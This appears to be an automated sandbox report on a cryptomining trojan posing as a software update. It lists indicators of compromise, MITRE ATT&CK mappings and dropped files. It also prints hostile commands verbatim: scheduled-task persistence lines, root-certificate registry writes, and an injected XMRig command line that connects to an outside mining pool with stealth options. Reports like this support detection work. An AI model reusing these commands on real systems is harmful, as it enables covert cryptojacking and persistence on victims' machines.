xmrig | b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae

Analysis

max time kernel
150s
max time network
152s
platform
windows7_x64
resource
win7v20210408
submitted
18-07-2021 23:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Software updated v2.6.0.exe
Size

256KB
MD5

18d05e20731583a22b495d0d1f107c5b
SHA1

2ced0e3577063ca3613b43661e7df5bc1411ab09
SHA256

b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
SHA512

36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1256-119-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/1256-120-0x00000001402EB66C-mapping.dmp	xmrig
behavioral1/memory/1256-122-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 6 IoCs

Processes:

xmrmine.exeetcmin.exertksmbs.exeserverpatch.exesihost32.exesihost64.exe

pid process

1320 xmrmine.exe
1128 etcmin.exe
1744 rtksmbs.exe
1940 serverpatch.exe
2008 sihost32.exe
1004 sihost64.exe
Loads dropped DLL 6 IoCs

Processes:

Software updated v2.6.0.exeetcmin.exexmrmine.exertksmbs.exeserverpatch.exe

pid process

1820 Software updated v2.6.0.exe
1820 Software updated v2.6.0.exe
1128 etcmin.exe
1320 xmrmine.exe
1744 rtksmbs.exe
1940 serverpatch.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

serverpatch.exe

description pid process target process

PID 1940 set thread context of 1256 1940 serverpatch.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1460 schtasks.exe
780 schtasks.exe
512 schtasks.exe
812 schtasks.exe

pid	process
1320	xmrmine.exe
1128	etcmin.exe
1744	rtksmbs.exe
1940	serverpatch.exe
2008	sihost32.exe
1004	sihost64.exe

pid	process
1820	Software updated v2.6.0.exe
1820	Software updated v2.6.0.exe
1128	etcmin.exe
1320	xmrmine.exe
1744	rtksmbs.exe
1940	serverpatch.exe

description	pid	process	target process
PID 1940 set thread context of 1256	1940	serverpatch.exe	explorer.exe

pid	process
1460	schtasks.exe
780	schtasks.exe
512	schtasks.exe
812	schtasks.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

rtksmbs.exeserverpatch.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	rtksmbs.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	rtksmbs.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	rtksmbs.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	rtksmbs.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	rtksmbs.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	rtksmbs.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	serverpatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c51900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	serverpatch.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

etcmin.exexmrmine.exertksmbs.exeserverpatch.exe

pid process

1128 etcmin.exe
1320 xmrmine.exe
1744 rtksmbs.exe
1940 serverpatch.exe

pid	process
1128	etcmin.exe
1320	xmrmine.exe
1744	rtksmbs.exe
1940	serverpatch.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

etcmin.exexmrmine.exertksmbs.exeserverpatch.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1128	etcmin.exe
Token: SeDebugPrivilege	1320	xmrmine.exe
Token: SeDebugPrivilege	1744	rtksmbs.exe
Token: SeDebugPrivilege	1940	serverpatch.exe
Token: SeLockMemoryPrivilege	1256	explorer.exe
Token: SeLockMemoryPrivilege	1256	explorer.exe

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

Software updated v2.6.0.exeetcmin.exexmrmine.execmd.execmd.exertksmbs.execmd.exeserverpatch.execmd.exe

description	pid	process	target process
PID 1820 wrote to memory of 1320	1820	Software updated v2.6.0.exe	xmrmine.exe
PID 1820 wrote to memory of 1320	1820	Software updated v2.6.0.exe	xmrmine.exe
PID 1820 wrote to memory of 1320	1820	Software updated v2.6.0.exe	xmrmine.exe
PID 1820 wrote to memory of 1320	1820	Software updated v2.6.0.exe	xmrmine.exe
PID 1820 wrote to memory of 1128	1820	Software updated v2.6.0.exe	etcmin.exe
PID 1820 wrote to memory of 1128	1820	Software updated v2.6.0.exe	etcmin.exe
PID 1820 wrote to memory of 1128	1820	Software updated v2.6.0.exe	etcmin.exe
PID 1820 wrote to memory of 1128	1820	Software updated v2.6.0.exe	etcmin.exe
PID 1128 wrote to memory of 1060	1128	etcmin.exe	cmd.exe
PID 1128 wrote to memory of 1060	1128	etcmin.exe	cmd.exe
PID 1128 wrote to memory of 1060	1128	etcmin.exe	cmd.exe
PID 1320 wrote to memory of 432	1320	xmrmine.exe	cmd.exe
PID 1320 wrote to memory of 432	1320	xmrmine.exe	cmd.exe
PID 1320 wrote to memory of 432	1320	xmrmine.exe	cmd.exe
PID 1060 wrote to memory of 1460	1060	cmd.exe	schtasks.exe
PID 1060 wrote to memory of 1460	1060	cmd.exe	schtasks.exe
PID 1060 wrote to memory of 1460	1060	cmd.exe	schtasks.exe
PID 432 wrote to memory of 780	432	cmd.exe	schtasks.exe
PID 432 wrote to memory of 780	432	cmd.exe	schtasks.exe
PID 432 wrote to memory of 780	432	cmd.exe	schtasks.exe
PID 1128 wrote to memory of 1744	1128	etcmin.exe	rtksmbs.exe
PID 1128 wrote to memory of 1744	1128	etcmin.exe	rtksmbs.exe
PID 1128 wrote to memory of 1744	1128	etcmin.exe	rtksmbs.exe
PID 1320 wrote to memory of 1940	1320	xmrmine.exe	serverpatch.exe
PID 1320 wrote to memory of 1940	1320	xmrmine.exe	serverpatch.exe
PID 1320 wrote to memory of 1940	1320	xmrmine.exe	serverpatch.exe
PID 1744 wrote to memory of 1200	1744	rtksmbs.exe	cmd.exe
PID 1744 wrote to memory of 1200	1744	rtksmbs.exe	cmd.exe
PID 1744 wrote to memory of 1200	1744	rtksmbs.exe	cmd.exe
PID 1200 wrote to memory of 512	1200	cmd.exe	schtasks.exe
PID 1200 wrote to memory of 512	1200	cmd.exe	schtasks.exe
PID 1200 wrote to memory of 512	1200	cmd.exe	schtasks.exe
PID 1744 wrote to memory of 2008	1744	rtksmbs.exe	sihost32.exe
PID 1744 wrote to memory of 2008	1744	rtksmbs.exe	sihost32.exe
PID 1744 wrote to memory of 2008	1744	rtksmbs.exe	sihost32.exe
PID 1940 wrote to memory of 1156	1940	serverpatch.exe	cmd.exe
PID 1940 wrote to memory of 1156	1940	serverpatch.exe	cmd.exe
PID 1940 wrote to memory of 1156	1940	serverpatch.exe	cmd.exe
PID 1940 wrote to memory of 1004	1940	serverpatch.exe	sihost64.exe
PID 1940 wrote to memory of 1004	1940	serverpatch.exe	sihost64.exe
PID 1940 wrote to memory of 1004	1940	serverpatch.exe	sihost64.exe
PID 1156 wrote to memory of 812	1156	cmd.exe	schtasks.exe
PID 1156 wrote to memory of 812	1156	cmd.exe	schtasks.exe
PID 1156 wrote to memory of 812	1156	cmd.exe	schtasks.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe
PID 1940 wrote to memory of 1256	1940	serverpatch.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe
"C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1820

C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1320

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:432

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
4⤵
- Creates scheduled task(s)
PID:780

C:\Users\Admin\appdata\roaming\serverpatch.exe
"C:\Users\Admin\appdata\roaming\serverpatch.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1940

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1156

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
5⤵
- Creates scheduled task(s)
PID:812

C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:1004

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1256

C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
4⤵
- Creates scheduled task(s)
PID:1460

C:\Users\Admin\appdata\roaming\rtksmbs.exe
"C:\Users\Admin\appdata\roaming\rtksmbs.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1200

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
5⤵
- Creates scheduled task(s)
PID:512

C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
4⤵
- Executes dropped EXE
PID:2008

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
MD5
2902de11e30dcc620b184e3bb0f0c1cb

SHA1
5d11d14a2558801a2688dc2d6dfad39ac294f222

SHA256
e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

SHA512
efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB5E2F83CE9B8330B0590B7CD2E5FF2E
MD5
d474de575c39b2d39c8583c5c065498a

SHA1
5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25

SHA256
7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf

SHA512
7b9cf079b9769dfa9eb2e28cf5a4da9922b0f80e415097d326bf20547505a6ab1b7ac6a83846d0b8253e9168b1f915b8974aec844a9b31c3adcab3aec89fcd07

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
68f912b28b2ac15bb26deb4418630163

SHA1
3219940d8711fcc3cfb87384b9d9d2c241228421

SHA256
3abab11d81177160dfe7e69768ed0edcc4252e016b8819327a640e63dc8e7a06

SHA512
b32ad169a06dc031b054c66ef402802ff8a5f670ab7d32453d4045f9efe68d80c313f1f3360ee3c039d3858b17dfd7e9415405ff442c5e0c66c626ed3c9a313b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB5E2F83CE9B8330B0590B7CD2E5FF2E
MD5
eff63d3f4d1231469f0797bf51e5bc10

SHA1
c1e690217f17a8151a4a30bc18b8793730f945ce

SHA256
728ae83f52771f100e07d93da68b2a21f9aaa1bf634643ec1f596fcb98cb88c1

SHA512
8884da2b96bb26c6cdd436c8d45e29c2b0029389d7ee49a4dbdd0eedeb2b6f1da251c71e08bc95e6007969b3c7470ea2460a6177dc3e9635fb1ddda10056b9ca

Download Submit
